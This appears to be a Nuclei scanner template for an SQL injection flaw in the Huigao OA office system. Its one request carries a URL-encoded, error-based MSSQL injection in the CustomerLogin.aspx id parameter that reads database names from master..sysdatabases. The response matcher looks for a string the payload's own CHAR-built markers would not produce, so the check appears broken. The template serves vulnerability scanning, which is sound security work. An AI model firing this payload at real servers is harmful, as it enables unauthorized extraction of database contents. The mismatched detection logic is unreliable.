id: huigao-oa-sqli

info:
  name: 汇高OA办公系统SQL注入漏洞
  author: Str1am
  severity: high
  tags: oa,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/CRMtable/PublicPage/CustomerLogin.aspx?id=1%27%20AND%201840%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%20FROM%20master..sysdatabases%20WHERE%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20NOT%20IN%20%28SELECT%20TOP%202%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20master..sysdatabases%20ORDER%20BY%20name%29%20ORDER%20BY%20name%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29--%20OlrO"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "qa0211180240"
        part: body
        condition: and
